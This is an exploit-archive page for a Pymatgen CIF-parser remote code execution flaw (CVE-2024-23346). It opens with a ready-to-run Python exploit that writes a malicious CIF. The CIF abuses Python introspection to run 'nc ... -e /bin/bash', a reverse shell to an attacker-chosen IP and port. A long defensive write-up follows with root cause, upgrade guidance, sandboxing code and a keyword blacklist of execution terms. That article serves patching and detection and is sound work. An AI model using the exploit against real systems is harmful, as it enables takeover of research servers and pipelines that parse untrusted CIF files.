Pymatgen 2024.1 - Remote Code Execution (RCE)

Exploit Author: Mohammed Idrees Banyamer
Analysis Author: www.bubbleslearn.ir
Category: Remote
Language: Python
Published Date: 2025-04-15

# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https://pymatgen.org
# Software Link : https://pypi.org/project/pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346


import os

# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
    # Constructing the malicious CIF file with reverse shell payload
    malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date            2024-11-13
_audit_creation_method          "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
    """
    
    # Save to a file
    with open("vuln.cif", "w") as file:
        file.write(malicious_cif)
    print("[*] Malicious CIF file created: vuln.cif")

# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
    ip = input("Enter your IP address for the reverse shell: ")
    port = input("Enter the port for the reverse shell to listen on: ")
    
    # Create the malicious CIF file
    create_malicious_cif(ip, port)
    
    # Trigger the Pymatgen CIF parser to parse the malicious file
    from pymatgen.io.cif import CifParser
    parser = CifParser("vuln.cif")
    structure = parser.parse_structures()

# Running the exploit
if __name__ == "__main__":
    exploit()

Pymatgen 2024.1 — Remote Code Execution (CVE-2024-23346): Analysis, Impact, and Mitigation

Pymatgen is a widely used Python library for materials analysis and file parsing (including CIF, the Crystallographic Information File format) in computational materials science. In 2024 a critical vulnerability, CVE-2024-23346, was disclosed in Pymatgen releases before 2024.2.20, including 2024.1: parsing an untrusted CIF through the affected code path can lead to remote code execution (RCE). This article explains the issue at a high level, its practical impact, and effective defensive measures for users, administrators, and library authors.

Executive summary

Vulnerability type: remote code execution (RCE) triggered by specially crafted CIF files parsed by the Pymatgen CIF parser.
Affected versions: Pymatgen releases before 2024.2.20, including 2024.1.
Impact: Arbitrary code execution under the privileges of the process running the parser.
Primary remediation: upgrade to Pymatgen 2024.2.20 or later. In addition, apply input sanitization, least-privilege execution, and environment isolation to untrusted inputs.

Technical overview (non-actionable)

At a high level, the root cause of this class of vulnerability is unsafe evaluation of data embedded in CIF files. CIFs are text files made of tagged metadata fields. If a parser passes a field value to Python evaluation or to unprotected deserialization, a maliciously crafted value runs as Python code inside the parsing process. For CVE-2024-23346, the public advisory traces the problem to JonesFaithfulTransformation.from_transformation_str(), which used eval() on the transformation string. The CIF parser reaches this method when it reads magnetic space-group transformation fields.
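To make the alternative to eval() concrete, here is a minimal sketch that parses a Jones-Faithful style transformation string such as "a-b,a+b,2c;1/2,0,0" against a strict grammar instead of evaluating it. The helper name parse_transformation and the accepted grammar are assumptions for illustration: integer or fractional coefficients on a, b and c, plus a fractional origin shift. This is not pymatgen's own fix, and real transformation strings may use forms it rejects.

```python
import re
from fractions import Fraction

# A term is an optional integer or fraction coefficient, then one of a, b, c.
_TERM = r"(?:\d+(?:/\d+)?\*?)?[abc]"
# A basis component is one term, or several terms joined by explicit + or - signs.
_COMPONENT = re.compile(rf"[+-]?{_TERM}(?:[+-]{_TERM})*")
_TERM_PARTS = re.compile(r"([+-]?)(\d+(?:/\d+)?)?\*?([abc])")
_NUMBER = re.compile(r"[+-]?\d+(?:/\d+)?")


def _to_fraction(token):
    try:
        return Fraction(token)
    except ZeroDivisionError:
        raise ValueError(f"zero denominator in {token!r}") from None


def parse_transformation(text):
    """Parse 'basis;origin' text without eval (hypothetical helper).

    Returns (rows, origin): each row holds the coefficients of one new basis
    vector in terms of a, b, c; origin holds the three shift components.
    """
    compact = text.replace(" ", "")
    basis_part, sep, origin_part = compact.partition(";")
    if not sep:
        raise ValueError("expected 'basis;origin'")
    basis_exprs = basis_part.split(",")
    origin_exprs = origin_part.split(",")
    if len(basis_exprs) != 3 or len(origin_exprs) != 3:
        raise ValueError("expected three basis and three origin components")

    rows = []
    for expr in basis_exprs:
        # Validate the whole component first; nothing is ever executed.
        if not _COMPONENT.fullmatch(expr):
            raise ValueError(f"rejected basis component: {expr!r}")
        coeffs = {"a": Fraction(0), "b": Fraction(0), "c": Fraction(0)}
        for sign, coeff, var in _TERM_PARTS.findall(expr):
            value = _to_fraction(coeff or "1")
            coeffs[var] += -value if sign == "-" else value
        rows.append([coeffs["a"], coeffs["b"], coeffs["c"]])

    origin = []
    for expr in origin_exprs:
        if not _NUMBER.fullmatch(expr):
            raise ValueError(f"rejected origin component: {expr!r}")
        origin.append(_to_fraction(expr))
    return rows, origin
```

Anything outside the grammar, including any Python syntax, raises ValueError instead of being executed. How these rows map onto pymatgen's own matrix convention is not shown here.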

For safety and ethical reasons this article does not contain proof-of-concept exploit payloads or parsing input that would reproduce the vulnerability. The goal here is to describe the problem and provide defensive guidance.

Why this matters — realistic attack scenarios

Automated pipelines: Research workflows or CI systems that automatically parse CIF files from external collaborators or public repositories could run the parser on untrusted data, giving an attacker a vector to run code on build servers.
Shared services: Web services that accept uploaded CIFs for visualization or analysis can be compromised if the parsing happens in-process without isolation.
Desktop research environments: A researcher opening a CIF from an unknown source could execute malicious code under their user account.

Vulnerability summary (recommended to include in inventories)

Item	Value
CVE	CVE-2024-23346
Product	Pymatgen (CIF parser)
Affected versions	Releases before 2024.2.20, including 2024.1
Fixed version	2024.2.20
Root cause	eval() in JonesFaithfulTransformation.from_transformation_str()
Impact	Remote code execution (process-level)

Detection and indicators of compromise (defensive)

Detecting exploitation attempts or suspicious CIFs can reduce risk. Focus on high-level indicators rather than sharing dangerous patterns.

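Unusual CIF metadata, or unusually long or complex string fields in uploaded files. Treat these as suspicious and route them to manual review. Python syntax such as dunder names (for example __class__) in a field that should hold numbers or symmetry operations is a strong signal.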
Unexpected child processes spawned from analysis/parsing services, or unexpected outbound network connections originating from a parser process.
New or unexpected files or changes made by the parser process, especially in directories where it normally does not write.
Elevated CPU or memory usage in parsing jobs, or parsing jobs that run longer than usual or hit their timeouts.
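The first indicator can be partly automated. The sketch below uses a hypothetical scan_cif_text helper and an illustrative pattern list to report CIF lines that are unusually long or contain Python-like tokens so that a person can review them. It is a triage aid, not a detector that can prove a file is safe.

```python
import re

# Heuristic review signals. These patterns are illustrative assumptions, not a
# complete signature set, and they will produce some false positives.
SUSPICIOUS_PATTERNS = [
    (re.compile(r"__\w+__"), "Python dunder name"),
    (re.compile(r"\b(?:import|eval|exec|system|popen|subprocess|load_module)\b"),
     "code-execution keyword"),
]


def scan_cif_text(text, max_line_length=200):
    """Return (line_number, reason) pairs for CIF lines that deserve manual review."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if len(line) > max_line_length:
            findings.append((lineno, f"line longer than {max_line_length} characters"))
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if pattern.search(line):
                findings.append((lineno, reason))
    return findings
```

A non-empty result would typically quarantine the file for review rather than reject it outright, because free-text CIF fields can trip the keyword pattern.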

Mitigation and best practices

Defensive controls should be layered: patching, input validation, isolation, monitoring, and secure coding practices.

1. Patch and upgrade

Primary action: upgrade Pymatgen to 2024.2.20 or later, the first release that contains the fix according to the public advisory for CVE-2024-23346. Confirm the fixed version against the official project page and release notes.
If you cannot upgrade immediately, apply the other mitigations below (isolation, sanitization) until the patch can be installed.
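To check whether an environment still runs an affected release, you can read the installed version with importlib.metadata and compare it with the fixed version. This sketch assumes that 2024.2.20 is the first fixed release, as stated in the public advisory, and uses a simple numeric comparison of the calendar-style version string. The helper names are hypothetical.

```python
import re
from importlib import metadata

# Assumption: 2024.2.20 is the first pymatgen release with the CVE-2024-23346 fix,
# as stated in the public advisory; confirm it against the release notes.
FIXED_VERSION = (2024, 2, 20)


def parse_calver(version):
    """Turn '2024.1.27' (or '2024.2.20.post1') into a tuple of ints such as (2024, 1, 27)."""
    match = re.match(r"\d+(?:\.\d+)*", version)
    if match is None:
        raise ValueError(f"unrecognised version string: {version!r}")
    return tuple(int(part) for part in match.group(0).split("."))


def is_vulnerable(version):
    return parse_calver(version) < FIXED_VERSION


def installed_pymatgen_status():
    """Return (version, vulnerable) for the installed pymatgen, or None if it is absent."""
    try:
        version = metadata.version("pymatgen")
    except metadata.PackageNotFoundError:
        return None
    return version, is_vulnerable(version)


if __name__ == "__main__":
    print(installed_pymatgen_status())
```

The simple parser ignores suffixes such as rc1 or .post1, so it would report a pre-release of 2024.2.20 as fixed. If the packaging library is available, packaging.version.Version gives a full PEP 440 comparison.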

2. Treat incoming CIFs as untrusted data

Do not parse CIF files from untrusted sources in the same privileged process used for other work.
Implement size limits, field-length limits, and basic sanitization on upload.
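Size, encoding and line-length limits are cheap to enforce before any parser sees the file. Here is a minimal sketch, assuming a hypothetical check_cif_upload function and placeholder limits that you would tune to your own data:

```python
# Hypothetical limits: tune them to the largest legitimate CIFs you expect to receive.
MAX_BYTES = 5 * 1024 * 1024
MAX_LINE_LENGTH = 512
ALLOWED_CONTROL = {"\t", "\n", "\r"}


def check_cif_upload(data, max_bytes=MAX_BYTES, max_line_length=MAX_LINE_LENGTH):
    """Reject oversized or malformed uploads; return the decoded text if accepted."""
    if len(data) > max_bytes:
        raise ValueError(f"upload is {len(data)} bytes; the limit is {max_bytes}")
    try:
        text = data.decode("utf-8")  # assumption: accept UTF-8 (which covers plain ASCII)
    except UnicodeDecodeError:
        raise ValueError("upload is not valid UTF-8 text") from None
    # Binary junk or NUL bytes have no place in a text CIF.
    if any(ord(ch) < 32 and ch not in ALLOWED_CONTROL for ch in text):
        raise ValueError("upload contains control characters")
    for lineno, line in enumerate(text.splitlines(), start=1):
        if len(line) > max_line_length:
            raise ValueError(f"line {lineno} exceeds {max_line_length} characters")
    return text
```

Rejecting files early keeps oversized or binary uploads away from the parser. It does not make a well-formed malicious CIF safe, so it complements patching and isolation rather than replacing them.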

3. Run parsers in isolation

Run parsing operations in a minimal-privilege environment. Options include:

Dedicated unprivileged user accounts or containers/VMs with network disabled.
Short-lived jobs that are resource-limited (CPU, memory, file-system access) and are killed after a timeout.
Server-side file handling in sandboxes such as OCI containers or Firejail. Do not rely on in-process, language-level sandboxing: Python offers no reliable way to confine untrusted code inside the same interpreter.
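For the short-lived, resource-limited job option, Python's standard library can apply POSIX rlimits to a child process. This sketch assumes a Linux or other POSIX host. The names run_with_limits and _make_limiter and their default limits are hypothetical. Rlimits restrict only CPU time and memory, not network or filesystem access, which still need a container or a tool such as Firejail.

```python
import resource
import subprocess
import sys


def _make_limiter(cpu_seconds, memory_bytes):
    """Build a preexec_fn that applies rlimits in the child just before exec (POSIX only)."""
    def apply_limits():
        # CPU seconds: the kernel terminates the child once it uses more than this.
        resource.setrlimit(resource.RLIMIT_CPU, (cpu_seconds, cpu_seconds))
        # Virtual address space: larger allocations fail (MemoryError in Python code).
        resource.setrlimit(resource.RLIMIT_AS, (memory_bytes, memory_bytes))
    return apply_limits


def run_with_limits(args, timeout=30, cpu_seconds=10, memory_bytes=1 << 30):
    """Run an argument list with CPU, memory and wall-clock limits (hypothetical helper)."""
    return subprocess.run(
        args,
        capture_output=True,
        stdin=subprocess.DEVNULL,
        timeout=timeout,  # wall-clock limit: the child is killed and TimeoutExpired is raised
        preexec_fn=_make_limiter(cpu_seconds, memory_bytes),
        env={"PATH": "/usr/bin:/bin"},  # do not inherit secrets from os.environ
        check=False,
    )


if __name__ == "__main__":
    # Example: a trivial child; in practice this would run your parser script.
    result = run_with_limits([sys.executable, "-c", "print('ok')"])
    print(result.returncode, result.stdout)
```

preexec_fn runs in the child between fork and exec. The subprocess documentation warns that it is not safe to use in the presence of threads, so multithreaded services may prefer to set the same limits in their container runtime.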

4. Defensive coding for library authors

Avoid executing or evaluating arbitrary expressions from file inputs (never call eval() on user-supplied data).
Prefer safe parsing functions and strict schema validation of CIF fields. In Python, ast.literal_eval accepts only literals such as numbers, strings, lists and tuples, and it rejects calls and attribute access.
Adopt a whitelisting approach: only accept expected value types and patterns for each CIF tag.
Add fuzz and unit tests that simulate malicious inputs to ensure new releases do not regress.
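A per-tag allow-list, plus ast.literal_eval where a value really must be read as a Python literal, can be sketched as follows. The three tag names are magCIF tags. The regular expressions, the validate_tag_value and parse_literal names, and the choice to reject unknown tags are illustrative assumptions, not rules taken from the CIF dictionaries.

```python
import ast
import re

# Hypothetical allow-list: each known tag maps to the only shape its value may take.
# The patterns are illustrative assumptions; derive real ones from the CIF dictionaries.
TAG_PATTERNS = {
    "_space_group_magn.number_BNS": re.compile(r"\d+\.\d+"),
    "_space_group_magn.transform_BNS_Pp_abc": re.compile(r"[abc0-9+\-*/,; ]+"),
    "_parent_propagation_vector.kxkykz": re.compile(r"\[[0-9./+\- ]+\]"),
}


def validate_tag_value(tag, value):
    """Accept a value only if its tag is known and the whole value matches its pattern."""
    pattern = TAG_PATTERNS.get(tag)
    if pattern is None:
        return False  # this sketch rejects tags outside the allow-list
    return pattern.fullmatch(value.strip().strip("'\"")) is not None


def parse_literal(value):
    """Evaluate Python literals only (numbers, strings, lists, tuples, dicts, sets, ...)."""
    # literal_eval raises ValueError for calls, names and attribute access.
    return ast.literal_eval(value)
```

The whole value must match with fullmatch, so a partial match cannot smuggle extra text past the check. The Python documentation notes that ast.literal_eval can also raise SyntaxError, MemoryError or RecursionError on hostile input, so apply size limits before calling it.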

5. Runtime monitoring and alerting

Monitor process activity: unexpected network connections or shell executions by parser processes should raise alerts.
Instrument parsers with logging of file sources and parse failures (avoid logging sensitive data).
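A thin wrapper around whatever parser you use can log file sources and parse failures. In this sketch, parse_with_audit_log is a hypothetical helper. It records a SHA-256 digest, the size and a caller-supplied source label, and on failure it logs only the exception type so that file contents never reach the logs.

```python
import hashlib
import logging

logger = logging.getLogger("cif_intake")


def parse_with_audit_log(data, source, parse):
    """Log where a CIF came from and whether parsing succeeded; `parse` is any callable."""
    digest = hashlib.sha256(data).hexdigest()
    logger.info("parsing CIF sha256=%s size=%d source=%s", digest, len(data), source)
    try:
        result = parse(data)
    except Exception as exc:
        # Record the exception type only, never the file contents.
        logger.warning("CIF parse failed sha256=%s error=%s", digest, type(exc).__name__)
        raise
    logger.info("CIF parse succeeded sha256=%s", digest)
    return result
```

The digest lets you find every system that received the same file during an investigation without storing the file in the logs.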

Safe example: validate CIF text before parsing (pattern only)

# Example: simple, defensive pre-check (non-exploit code)
# This snippet demonstrates a simple, executable approach:
#  - read the CIF as text
#  - reject it if suspicious tokens appear
#  - only then hand it to the trusted parser

import re

# Coarse blacklist of tokens that never belong in legitimate CIF data.
# Blacklists are easy to evade, so combine this check with isolated parsing.
BLACKLISTED_SUBSTRINGS = ("exec(", "eval(", "popen(", "system(", "subprocess", "load_module")
DUNDER_NAME = re.compile(r"__\w+__")  # e.g. __class__, __mro__, __import__

def is_suspicious_cif_text(text):
    # Python object introspection relies on dunder names, so any of them is a red flag.
    if DUNDER_NAME.search(text):
        return True
    # Remove whitespace so that "eval (" or ".system (" cannot slip past the check.
    compact = re.sub(r"\s+", "", text)
    return any(s in compact for s in BLACKLISTED_SUBSTRINGS)

def safe_parse_cif(file_path, parser_callable):
    with open(file_path, "r", encoding="utf-8", errors="replace") as f:
        content = f.read()
    if is_suspicious_cif_text(content):
        raise ValueError("CIF content failed basic safety checks")
    # parser_callable should be the vetted Pymatgen parser AFTER upgrading to a patched
    # version, e.g. lambda path: CifParser(path).parse_structures()
    return parser_callable(file_path)

Explanation: This illustrates a defensive pre-check of CIF text before parsing. It is deliberately simple. A substring blacklist is easy to evade, for example by assembling a name from concatenated strings, so production deployments should prefer allow-list validation of each field and run parsing inside an isolated execution environment.

Safe example: run parsing in a sandboxed subprocess

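# Run a parser command in a separate process with a timeout and a minimal environment.
# Adapt the command to your OS and container tooling: the child process only provides
# real isolation if the command itself runs inside a container or sandbox.

import shlex
import subprocess

def run_parser_safely(cmd, timeout=10):
    # cmd: a command string (or argument list) that invokes the parser inside a
    # container or restricted environment, e.g. via your container runtime.
    args = shlex.split(cmd) if isinstance(cmd, str) else list(cmd)
    try:
        proc = subprocess.run(args,
                              stdout=subprocess.PIPE,
                              stderr=subprocess.PIPE,
                              stdin=subprocess.DEVNULL,
                              timeout=timeout,  # child is killed if it runs too long
                              check=False,
                              env={"PATH": "/usr/bin:/bin"})  # no inherited secrets
    except subprocess.TimeoutExpired:
        return None, b"", b"parser timed out"
    return proc.returncode, proc.stdout, proc.stderr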

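Explanation: This pattern runs parsing in a separate process with a timeout and without inherited environment variables. A hung or crashing parse therefore cannot take down the calling service, and secrets stored in environment variables are not exposed to it. A plain subprocess still runs with the caller's user privileges, filesystem access and network access, so real containment comes from the container or sandbox that the command starts. Use proper containerization, filesystem and network restrictions, and OS resource limits in production.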
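One way to supply the filesystem and network restrictions is to start the parser in a throwaway Docker container. The sketch below only builds the argument list. The image name cif-parser:latest and the in-container script /app/parse_cif.py are hypothetical. The flags shown are standard docker run options, but you should check them against your Docker version.

```python
from pathlib import Path


def docker_parse_command(cif_path, image="cif-parser:latest"):
    """Build a docker CLI argument list that parses one CIF with no network access.

    Hypothetical: the image name and /app/parse_cif.py inside it are placeholders.
    """
    host_file = Path(cif_path).resolve()
    return [
        "docker", "run", "--rm",
        "--network", "none",                    # no outbound connections
        "--read-only",                          # read-only root filesystem
        "--cap-drop", "ALL",                    # drop all Linux capabilities
        "--security-opt", "no-new-privileges",  # block privilege escalation via setuid
        "--user", "65534:65534",                # unprivileged UID/GID (often "nobody")
        "--memory", "512m", "--cpus", "1", "--pids-limit", "64",
        "--mount", f"type=bind,source={host_file},target=/input/input.cif,readonly",
        image,
        "python", "/app/parse_cif.py", "/input/input.cif",
    ]
```

The returned list can be passed directly to subprocess.run with a timeout. A path containing commas would break the --mount value. If the parser writes temporary files, you may also need a --tmpfs /tmp mount.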

Incident response checklist

If you suspect exploitation, isolate the affected host and preserve logs and samples of the CIF file(s).
Search for lateral movement indicators and unexpected processes spawned by user-level Python interpreters.
Upgrade your Pymatgen instances to the patched release and rotate any credentials or secrets that may have been accessible to the compromised environment.
Notify affected stakeholders and follow your organization’s breach response procedures.

Recommendations for research groups and service operators

Inventory all systems and pipelines that parse CIFs and determine whether Pymatgen 2024.1 (or other vulnerable versions) is used.
Schedule an immediate upgrade to a patched version or apply compensating controls if immediate upgrade is not possible.
Document data intake policies: only accept CIFs from trusted sources or run all untrusted inputs through the sandboxed pipeline.
Adopt a security review process for third-party libraries used in automated analysis pipelines.
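For the inventory step, a quick first pass is to search repositories for requirement files that pin an affected version. The hypothetical find_vulnerable_pins helper below assumes pins written as pymatgen==X.Y.Z in files named requirements*.txt, and it treats 2024.2.20 as the first fixed release. It does not cover version ranges, extras, lock files or conda environments, so those still need manual review.

```python
import re
from pathlib import Path

FIXED = (2024, 2, 20)  # assumption: first fixed release, per the public advisory
PIN = re.compile(r"^\s*pymatgen\s*==\s*(\d+(?:\.\d+)*)", re.IGNORECASE)


def find_vulnerable_pins(root):
    """Yield (file, line_number, version) for pymatgen pins below FIXED."""
    for path in Path(root).rglob("requirements*.txt"):
        lines = path.read_text(encoding="utf-8", errors="replace").splitlines()
        for lineno, line in enumerate(lines, start=1):
            match = PIN.match(line)
            if match is None:
                continue
            version = tuple(int(part) for part in match.group(1).split("."))
            if version < FIXED:
                yield str(path), lineno, match.group(1)
```

Each hit points at a file and line to update, which makes the results easy to turn into upgrade tickets.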